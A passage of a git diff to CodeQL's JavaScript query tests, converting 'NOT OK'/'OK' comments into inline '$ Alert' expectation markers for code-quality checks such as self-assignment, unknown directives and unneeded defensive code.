width | This expression assigns variable width to itself. | +| tst.js:22:1:22:19 | array[1] = array[1] | This expression assigns element 1 to itself. | +| tst.js:24:1:24:9 | o.x = o.x | This expression assigns property x to itself. | diff --git a/javascript/ql/test/query-tests/Expressions/SelfAssignment/SelfAssignment.qlref b/javascript/ql/test/query-tests/Expressions/SelfAssignment/SelfAssignment.qlref index 8956117be70e..592467638457 100644 --- a/javascript/ql/test/query-tests/Expressions/SelfAssignment/SelfAssignment.qlref +++ b/javascript/ql/test/query-tests/Expressions/SelfAssignment/SelfAssignment.qlref @@ -1 +1,2 @@ -Expressions/SelfAssignment.ql \ No newline at end of file +query: Expressions/SelfAssignment.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/SelfAssignment/jsdoc.js b/javascript/ql/test/query-tests/Expressions/SelfAssignment/jsdoc.js index 03bfc0b5573b..d72b3ec65f94 100644 --- a/javascript/ql/test/query-tests/Expressions/SelfAssignment/jsdoc.js +++ b/javascript/ql/test/query-tests/Expressions/SelfAssignment/jsdoc.js @@ -6,8 +6,8 @@ class C extends Q { */ this.x = this.x; // OK - documentation - this.y = this.y; // NOT OK + this.y = this.y; // $ Alert - this.arg = this.arg; // NOT OK + this.arg = this.arg; // $ Alert } } diff --git a/javascript/ql/test/query-tests/Expressions/SelfAssignment/tst.js b/javascript/ql/test/query-tests/Expressions/SelfAssignment/tst.js index 246651e37a67..36eb815fc2dd 100644 --- a/javascript/ql/test/query-tests/Expressions/SelfAssignment/tst.js +++ b/javascript/ql/test/query-tests/Expressions/SelfAssignment/tst.js @@ -1,8 +1,7 @@ function Rectangle(x, y, width, height) { this.x = x; this.y = y; - // NOT OK - width = width; + width = width; // $ Alert this.height = height; } @@ -15,18 +14,16 @@ Rectangle.prototype = { this.width = a/this.height; }, foo: function() { - // OK + this.area = this.area; } }; -// NOT OK -array[1] = array[1]; +array[1] = array[1]; // $ Alert + +o.x = o.x; // $ Alert -// NOT OK -o.x = o.x; -// OK document.innerHTML = document.innerHTML; class Point { @@ -43,7 +40,7 @@ class Point { this.y = 0; } foo() { - // OK + this.dist = this.dist; } } diff --git a/javascript/ql/test/query-tests/Expressions/ShiftOutOfRange/ShiftOutOfRange.qlref b/javascript/ql/test/query-tests/Expressions/ShiftOutOfRange/ShiftOutOfRange.qlref index 1c2d75cde4ad..609eb065ea75 100644 --- a/javascript/ql/test/query-tests/Expressions/ShiftOutOfRange/ShiftOutOfRange.qlref +++ b/javascript/ql/test/query-tests/Expressions/ShiftOutOfRange/ShiftOutOfRange.qlref @@ -1 +1,2 @@ -Expressions/ShiftOutOfRange.ql \ No newline at end of file +query: Expressions/ShiftOutOfRange.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/ShiftOutOfRange/tst.js b/javascript/ql/test/query-tests/Expressions/ShiftOutOfRange/tst.js index a8cedd993b2a..1ee755fd46b9 100644 --- a/javascript/ql/test/query-tests/Expressions/ShiftOutOfRange/tst.js +++ b/javascript/ql/test/query-tests/Expressions/ShiftOutOfRange/tst.js @@ -1,2 +1,2 @@ -var n = 1<<40; // NOT OK -var n2 = BigInt(1) << 40n; // OK +var n = 1<<40; // $ Alert +var n2 = BigInt(1) << 40n; diff --git a/javascript/ql/test/query-tests/Expressions/StringInsteadOfRegex/StringInsteadOfRegex.qlref b/javascript/ql/test/query-tests/Expressions/StringInsteadOfRegex/StringInsteadOfRegex.qlref index a3772e3b4dd1..9f842782a35b 100644 --- a/javascript/ql/test/query-tests/Expressions/StringInsteadOfRegex/StringInsteadOfRegex.qlref +++ b/javascript/ql/test/query-tests/Expressions/StringInsteadOfRegex/StringInsteadOfRegex.qlref @@ -1 +1,2 @@ -Expressions/StringInsteadOfRegex.ql \ No newline at end of file +query: Expressions/StringInsteadOfRegex.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/StringInsteadOfRegex/tst.js b/javascript/ql/test/query-tests/Expressions/StringInsteadOfRegex/tst.js index 685b56525e06..79557ef1563e 100644 --- a/javascript/ql/test/query-tests/Expressions/StringInsteadOfRegex/tst.js +++ b/javascript/ql/test/query-tests/Expressions/StringInsteadOfRegex/tst.js @@ -1,46 +1,46 @@ function NOT_OK() { // regex-like strings - "".replace("/foo/i", ""); - "".replace("/^foo/", ""); - "".replace("/foo$/", ""); - "".replace("^foo$", ""); - "".replace("\s", ""); - "".replace("foo\sbar", ""); - "".replace("foo\s", ""); - "".replace("\sbar", ""); - "".replace("foo\[bar", ""); - "".replace("\[", ""); - "".replace("\]", ""); - "".replace("\(", ""); - "".replace("\)", ""); - "".replace("\*", ""); - "".replace("\+", ""); - "".replace("\?", ""); - "".replace("\{", ""); - "".replace("\}", ""); - "".replace("\|", ""); - "".replace("\^", ""); - "".replace("\$", ""); - "".replace("[a-zA-Z123]+", ""); - "".replace("[a-z]+", ""); - "".replace("[a-z]*", ""); - "".replace("[0-9_-]+", ""); - "".replace("[^a-z]+", ""); - "".replace("foo[^a-z]+bar", ""); + "".replace("/foo/i", ""); // $ Alert + "".replace("/^foo/", ""); // $ Alert + "".replace("/foo$/", ""); // $ Alert + "".replace("^foo$", ""); // $ Alert + "".replace("\s", ""); // $ Alert + "".replace("foo\sbar", ""); // $ Alert + "".replace("foo\s", ""); // $ Alert + "".replace("\sbar", ""); // $ Alert + "".replace("foo\[bar", ""); // $ Alert + "".replace("\[", ""); // $ Alert + "".replace("\]", ""); // $ Alert + "".replace("\(", ""); // $ Alert + "".replace("\)", ""); // $ Alert + "".replace("\*", ""); // $ Alert + "".replace("\+", ""); // $ Alert + "".replace("\?", ""); // $ Alert + "".replace("\{", ""); // $ Alert + "".replace("\}", ""); // $ Alert + "".replace("\|", ""); // $ Alert + "".replace("\^", ""); // $ Alert + "".replace("\$", ""); // $ Alert + "".replace("[a-zA-Z123]+", ""); // $ Alert + "".replace("[a-z]+", ""); // $ Alert + "".replace("[a-z]*", ""); // $ Alert + "".replace("[0-9_-]+", ""); // $ Alert + "".replace("[^a-z]+", ""); // $ Alert + "".replace("foo[^a-z]+bar", ""); // $ Alert // shapes - f().replace("/foo/i", x); + f().replace("/foo/i", x); // $ Alert var v1 = "/foo/i"; - f().replace(v1, x); - o.p.q.replace("/foo/i", x); + f().replace(v1, x); // $ Alert + o.p.q.replace("/foo/i", x); // $ Alert // examples in the wild - "".replace('^\s+|\s+$', ''); - "".replace("[^a-zA-Z0-9 ]+", ""); + "".replace('^\s+|\s+$', ''); // $ Alert + "".replace("[^a-zA-Z0-9 ]+", ""); // $ Alert // non-replace methods - "".split("/foo/i"); - "".split("/foo/i", x); + "".split("/foo/i"); // $ Alert + "".split("/foo/i", x); // $ Alert } function OK() { diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/SuspiciousInvocation.expected b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/SuspiciousInvocation.expected index 990eaa36148f..1ce095b51938 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/SuspiciousInvocation.expected +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/SuspiciousInvocation.expected @@ -2,5 +2,5 @@ | namespace.ts:23:1:23:3 | g() | Callee is not a function: it has type object. | | optional-chaining.js:3:5:3:7 | a() | Callee is not a function: it has type null. | | optional-chaining.js:7:5:7:7 | b() | Callee is not a function: it has type undefined. | -| super.js:11:5:11:11 | super() | Callee is not a function: it has type number. | +| super.js:10:5:10:11 | super() | Callee is not a function: it has type number. | | unreachable-code.js:5:9:5:11 | f() | Callee is not a function: it has type undefined. | diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/SuspiciousInvocation.js b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/SuspiciousInvocation.js index dba61f9ff1d3..bdd3414222ea 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/SuspiciousInvocation.js +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/SuspiciousInvocation.js @@ -8,6 +8,6 @@ function processResponse(response) { if (error) throw error; } else { - error("Unexpected response status " + response.status); + error("Unexpected response status " + response.status); // $ Alert } } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/SuspiciousInvocation.qlref b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/SuspiciousInvocation.qlref index 23c91fb3f00d..2ef227101966 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/SuspiciousInvocation.qlref +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/SuspiciousInvocation.qlref @@ -1 +1,2 @@ -Expressions/SuspiciousInvocation.ql \ No newline at end of file +query: Expressions/SuspiciousInvocation.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/eval.js b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/eval.js index dfc03927130f..db14aca9ea65 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/eval.js +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/eval.js @@ -1,12 +1,12 @@ function foo() { var f; eval("f = alert"); - f("Hi"); // OK: initialised by eval + f("Hi"); // OK - initialised by eval } function bar() { var g; - g(); // NOT OK, but not currently flagged + g(); // $ MISSING: Alert eval("g = alert"); } @@ -15,10 +15,10 @@ function baz() { function inner(b) { if (b) { inner(false); - g(); // OK: initialised by eval below + g(); // OK - initialised by eval below } else { eval("g = alert"); } } inner(true); -} \ No newline at end of file +} diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/namespace.ts b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/namespace.ts index c1060e342d37..f03a7ca7150d 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/namespace.ts +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/namespace.ts @@ -5,20 +5,20 @@ namespace f { export function inner() {} } -f(); // OK -f.inner(); // OK +f(); +f.inner(); class C {} namespace C { export function inner() {} } -new C(); // OK -C.inner(); // OK +new C(); +C.inner(); namespace g { export function inner() {} } -g(); // NOT OK -g.inner(); // OK +g(); // $ Alert +g.inner(); diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/optional-chaining.js b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/optional-chaining.js index 9be73a4dde52..acbfddcf53c7 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/optional-chaining.js +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/optional-chaining.js @@ -1,9 +1,9 @@ (function(){ var a = null; - a(); + a(); // $ Alert a?.(); var b = undefined; - b(); + b(); // $ Alert b?.(); }); diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/super.js b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/super.js index 17152efab227..69754fb386dc 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/super.js +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/super.js @@ -1,13 +1,12 @@ class A extends null { constructor() { - // OK: calls `Function.prototype` + // OK - calls `Function.prototype` super(); } } class B extends 42 { constructor() { - // NOT OK - super(); + super(); // $ Alert } } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/unreachable-code.js b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/unreachable-code.js index b8b89198c46f..b3bd335ede66 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/unreachable-code.js +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/unreachable-code.js @@ -2,7 +2,7 @@ var getF = function(){} var f = getF(); (function () { - f(); + f(); // $ Alert }); }); diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/SuspiciousPropAccess.js b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/SuspiciousPropAccess.js index 4d9aaf9e67dc..5339b6e8903d 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/SuspiciousPropAccess.js +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/SuspiciousPropAccess.js @@ -1,7 +1,7 @@ function f() { var result; res = computeInterestingResult(); - return result.value; + return result.value; // $ Alert } (function(_window) { diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/SuspiciousPropAccess.qlref b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/SuspiciousPropAccess.qlref index df93925770dd..26f1debdfefe 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/SuspiciousPropAccess.qlref +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/SuspiciousPropAccess.qlref @@ -1 +1,2 @@ -Expressions/SuspiciousPropAccess.ql \ No newline at end of file +query: Expressions/SuspiciousPropAccess.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/export_equals_client.ts b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/export_equals_client.ts index 5b552a15bf2c..0375d6e6327c 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/export_equals_client.ts +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/export_equals_client.ts @@ -1,5 +1,5 @@ import C from "./export_equals"; function f() { - C.staticMethod(); // OK + C.staticMethod(); } diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/export_import_client.ts b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/export_import_client.ts index 5c6d9b12d92c..a9f9b5b9ed9a 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/export_import_client.ts +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/export_import_client.ts @@ -1,5 +1,5 @@ import { importExport } from "./export_import"; function test() { - let f = importExport.prop; // OK + let f = importExport.prop; } diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/optional-chaining.js b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/optional-chaining.js index fa6003ad7959..f755be1ded02 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/optional-chaining.js +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/optional-chaining.js @@ -1,9 +1,9 @@ (function(){ var a = null; - a.p; + a.p; // $ Alert a?.p; var b = undefined; - b.p; + b.p; // $ Alert b?.p; }); diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/tst.js b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/tst.js index 114fbec93fb4..32e703fc7a4d 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/tst.js +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/tst.js @@ -29,5 +29,5 @@ }); (function(){ - function a(){return null;} a(1)[0]; + function a(){return null;} a(1)[0]; // $ Alert }); diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/tst2.ts b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/tst2.ts index 7cbadb3b5b0a..93ac4836644c 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/tst2.ts +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/tst2.ts @@ -16,9 +16,9 @@ C.foo = 3; namespace N { var x; - x.p = 5; + x.p = 5; // $ Alert - var q = M.Color.Blue; // OK + var q = M.Color.Blue; namespace M { export const enum Color { Blue } diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/typeassertion.ts b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/typeassertion.ts index b4c6980c053c..e3de0b44305e 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/typeassertion.ts +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/typeassertion.ts @@ -8,10 +8,10 @@ function f(x: Base[]) { if (x) { y = x[0] as Sub; } - y.field; // OK + y.field; var z = null as Sub; - z.field; // NOT OK + z.field; // $ Alert } f([new Sub()]); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/typeoftype.ts b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/typeoftype.ts index bd677367a9bf..7f0d7be210f7 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/typeoftype.ts +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/typeoftype.ts @@ -1,6 +1,6 @@ function f() { - var y: typeof N.x // OK - var z = N.x // NOT OK (currently missed due to const enum workaround) + var y: typeof N.x + var z = N.x // $ MISSING: Alert - missed due to const enum workaround namespace N { export var x = 45 } diff --git a/javascript/ql/test/query-tests/Expressions/UnboundEventHandlerReceiver/UnboundEventHandlerReceiver.qlref b/javascript/ql/test/query-tests/Expressions/UnboundEventHandlerReceiver/UnboundEventHandlerReceiver.qlref index 6d28236a2296..bcdab46394a1 100644 --- a/javascript/ql/test/query-tests/Expressions/UnboundEventHandlerReceiver/UnboundEventHandlerReceiver.qlref +++ b/javascript/ql/test/query-tests/Expressions/UnboundEventHandlerReceiver/UnboundEventHandlerReceiver.qlref @@ -1 +1,2 @@ -Expressions/UnboundEventHandlerReceiver.ql \ No newline at end of file +query: Expressions/UnboundEventHandlerReceiver.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/UnboundEventHandlerReceiver/tst.js b/javascript/ql/test/query-tests/Expressions/UnboundEventHandlerReceiver/tst.js index 27409330cd38..f6039b673435 100644 --- a/javascript/ql/test/query-tests/Expressions/UnboundEventHandlerReceiver/tst.js +++ b/javascript/ql/test/query-tests/Expressions/UnboundEventHandlerReceiver/tst.js @@ -5,7 +5,7 @@ class Component0 extends React.Component { render() { return
    -
    // OK +
    } @@ -24,20 +24,20 @@ class Component1 extends React.Component { render() { var unbound3 = this.unbound3; return
    -
    // NOT OK -
    // NOT OK -
    // NOT OK -
    // OK -
    // OK -
    // OK -
    // OK -
    this.unbound_butInvokedSafely(e)}/> // OK -
    // OK -
    // OK -
    // OK -
    // OK -
    // OK -
    // OK +
    { /* $ Alert */ } +
    { /* $ Alert */ } +
    { /* $ Alert */ } +
    +
    +
    +
    +
    this.unbound_butInvokedSafely(e)}/> +
    +
    +
    +
    +
    +
    } @@ -125,7 +125,7 @@ class Component2 extends React.Component { render() { return
    -
    // OK +
    ; } @@ -139,7 +139,7 @@ class Component3 extends React.Component { render() { return
    -
    // OK +
    } @@ -159,7 +159,7 @@ class Component4 extends React.Component { render() { return
    -
    // OK +
    } @@ -177,7 +177,7 @@ class Component5 extends React.Component { render() { return
    -
    // OK +
    } diff --git a/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/UnclearOperatorPrecedence.qlref b/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/UnclearOperatorPrecedence.qlref index 5a9a25e11186..d4887864cb1d 100644 --- a/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/UnclearOperatorPrecedence.qlref +++ b/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/UnclearOperatorPrecedence.qlref @@ -1 +1,2 @@ -Expressions/UnclearOperatorPrecedence.ql \ No newline at end of file +query: Expressions/UnclearOperatorPrecedence.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.js b/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.js index 5490b0b4232a..9aa369d69b21 100644 --- a/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.js +++ b/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.js @@ -1,10 +1,10 @@ -x.f() & 0x0A != 0; // NOT OK -x.f() & (0x0A != 0); // OK -x.f() & 0x0A != 0; // OK -x.f() & 0x0A!=0; // OK +x.f() & 0x0A != 0; // $ Alert +x.f() & (0x0A != 0); +x.f() & 0x0A != 0; +x.f() & 0x0A!=0; -x !== y & 1; // NOT OK +x !== y & 1; // $ Alert -x > 0 & x < 10; // OK +x > 0 & x < 10; -a&b==c; // NOT OK +a&b==c; // $ Alert diff --git a/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.min.js b/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.min.js index 800b7b08df2c..d39838870c81 100644 --- a/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.min.js +++ b/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.min.js @@ -1 +1 @@ -a&b==c; // OK (minified file) +a&b==c; // OK - minified file diff --git a/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.html b/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.html index 87f969c3e179..03ac0651186e 100644 --- a/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.html +++ b/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.html @@ -1,6 +1,6 @@ - - - + + + diff --git a/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.js b/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.js index 0645f8821a1d..e86b7b9d95bc 100644 --- a/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.js +++ b/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.js @@ -1,51 +1,51 @@ -"use foo"; // NOT OK -"use strict"; // NOT OK +"use foo"; // $ Alert +"use strict"; function bad() { - "'use strict'"; // NOT OK - "use strict;"; // NOT OK - "'use strict';"; // NOT OK - "'use strict;'"; // NOT OK - "use-strict"; // NOT OK - "use_strict"; // NOT OK - "uses strict"; // NOT OK - "use struct;" // NOT OK - "Use Strict"; // NOT OK - "use bar"; // NOT OK + "'use strict'"; // $ Alert + "use strict;"; // $ Alert + "'use strict';"; // $ Alert + "'use strict;'"; // $ Alert + "use-strict"; // $ Alert + "use_strict"; // $ Alert + "uses strict"; // $ Alert + "use struct;" // $ Alert + "Use Strict"; // $ Alert + "use bar"; // $ Alert } function ignored() { var x = 42; - "use baz"; // OK: not a directive, positionally + "use baz"; // OK - not a directive, positionally } function good() { - "use strict"; // OK - "use asm"; // OK - "use babel"; // OK - "use 6to5"; // OK - "format cjs" // OK - "format esm"; // OK - "format global"; // OK - "format register"; // OK - "ngInject"; // OK - "ngNoInject"; // OK - "deps foo"; // OK - "deps bar"; // OK - "use server"; // OK - "use client"; // OK + "use strict"; + "use asm"; + "use babel"; + "use 6to5"; + "format cjs" + "format esm"; + "format global"; + "format register"; + "ngInject"; + "ngNoInject"; + "deps foo"; + "deps bar"; + "use server"; + "use client"; } function data() { - "[0, 0, 0];"; // NOT OK - "[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0];"; // NOT OK + "[0, 0, 0];"; // $ Alert + "[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0];"; // $ Alert } function yui() { - "foo:nomunge"; // OK - "bar:nomunge, baz:nomunge,qux:nomunge"; // OK - ":nomunge"; // NOT OK - "foo(), bar, baz:nomunge"; // NOT OK + "foo:nomunge"; + "bar:nomunge, baz:nomunge,qux:nomunge"; + ":nomunge"; // $ Alert + "foo(), bar, baz:nomunge"; // $ Alert } function babel_typeof(obj) { diff --git a/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.qlref b/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.qlref index 2cd60100c59e..0fa5fe40535d 100644 --- a/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.qlref +++ b/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.qlref @@ -1 +1,2 @@ -Expressions/UnknownDirective.ql \ No newline at end of file +query: Expressions/UnknownDirective.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/HeterogeneousComparison.qlref b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/HeterogeneousComparison.qlref index 13b0e2a181cb..22ce4796bb35 100644 --- a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/HeterogeneousComparison.qlref +++ b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/HeterogeneousComparison.qlref @@ -1 +1,2 @@ -Expressions/HeterogeneousComparison.ql \ No newline at end of file +query: Expressions/HeterogeneousComparison.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/UnneededDefensiveProgramming.qlref b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/UnneededDefensiveProgramming.qlref index 13c05f1e74bd..98fc974827b4 100644 --- a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/UnneededDefensiveProgramming.qlref +++ b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/UnneededDefensiveProgramming.qlref @@ -1 +1,2 @@ -Expressions/UnneededDefensiveProgramming.ql +query: Expressions/UnneededDefensiveProgramming.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/UselessConditional.qlref b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/UselessConditional.qlref index d29916245d6e..85ffff223221 100644 --- a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/UselessConditional.qlref +++ b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/UselessConditional.qlref @@ -1 +1,2 @@ -Statements/UselessConditional.ql \ No newline at end of file +query: Statements/UselessConditional.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/global-module-definition.js b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/global-module-definition.js index 8c61f38d1132..99e77e8cc491 100644 --- a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/global-module-definition.js +++ b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/global-module-definition.js @@ -7,5 +7,5 @@ var Mod1; var Mod2; (function (Mod2) { Mod2.p = 42; - })(Mod2 || (Mod2 = {})); // NOT OK + })(Mod2 || (Mod2 = {})); }); diff --git a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/module-environment-detection.js b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/module-environment-detection.js index 913684d6f6aa..1de67b231fa8 100644 --- a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/module-environment-detection.js +++ b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/module-environment-detection.js @@ -20,5 +20,5 @@ if (typeof exports !== 'undefined') { (function(){ var module; - if(typeof module === 'undefined'); // NOT OK + if(typeof module === 'undefined'); // $ Alert[js/unneeded-defensive-code] }); diff --git a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/regression.js b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/regression.js index cfc6f1e6df71..adf17a8b3fd0 100644 --- a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/regression.js +++ b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/regression.js @@ -6,10 +6,10 @@ function getDate() { return null; } console.log(date); - return date && date.getTime(); // NOT OK + return date && date.getTime(); // $ Alert[js/unneeded-defensive-code] } function isNotNullOrString(obj) { - return obj != null && obj != undefined && // NOT OK - typeof obj != 'string'; + return obj != null && obj != undefined && // $ Alert[js/unneeded-defensive-code] + typeof obj != 'string'; } diff --git a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst.js b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst.js index ace5a3dd7ac8..7b4a4b799e06 100644 --- a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst.js +++ b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst.js @@ -10,95 +10,95 @@ var o_ = o; var x_ = x; - u_ = u_ || e; // NOT OK - n_ = n_ || e; // NOT OK - o_ = o_ || e; // NOT OK + u_ = u_ || e; // $ MISSING: Alert[js/unneeded-defensive-code] + n_ = n_ || e; // $ MISSING: Alert[js/unneeded-defensive-code] + o_ = o_ || e; // $ MISSING: Alert[js/unneeded-defensive-code] x_ = x_ || e; - u && u.p; // NOT OK - n && n.p; // NOT OK - o && o.p; // NOT OK + u && u.p; // $ Alert[js/unneeded-defensive-code] + n && n.p; // $ Alert[js/unneeded-defensive-code] + o && o.p; // $ Alert[js/unneeded-defensive-code] x && x.p; - u && u(); // NOT OK - n && n(); // NOT OK - o && o(); // NOT OK + u && u(); // $ Alert[js/unneeded-defensive-code] + n && n(); // $ Alert[js/unneeded-defensive-code] + o && o(); // $ Alert[js/unneeded-defensive-code] x && x(); - !u || u.p; // NOT OK - !n || n.p; // NOT OK - !o || o.p; // NOT OK + !u || u.p; // $ Alert[js/unneeded-defensive-code] + !n || n.p; // $ Alert[js/unneeded-defensive-code] + !o || o.p; // $ Alert[js/unneeded-defensive-code] !x || x.p; - !!u && u.p; // NOT OK - !!n && n.p; // NOT OK - !!o && o.p; // NOT OK + !!u && u.p; // $ Alert[js/unneeded-defensive-code] + !!n && n.p; // $ Alert[js/unneeded-defensive-code] + !!o && o.p; // $ Alert[js/unneeded-defensive-code] !!x && x.p; - u != 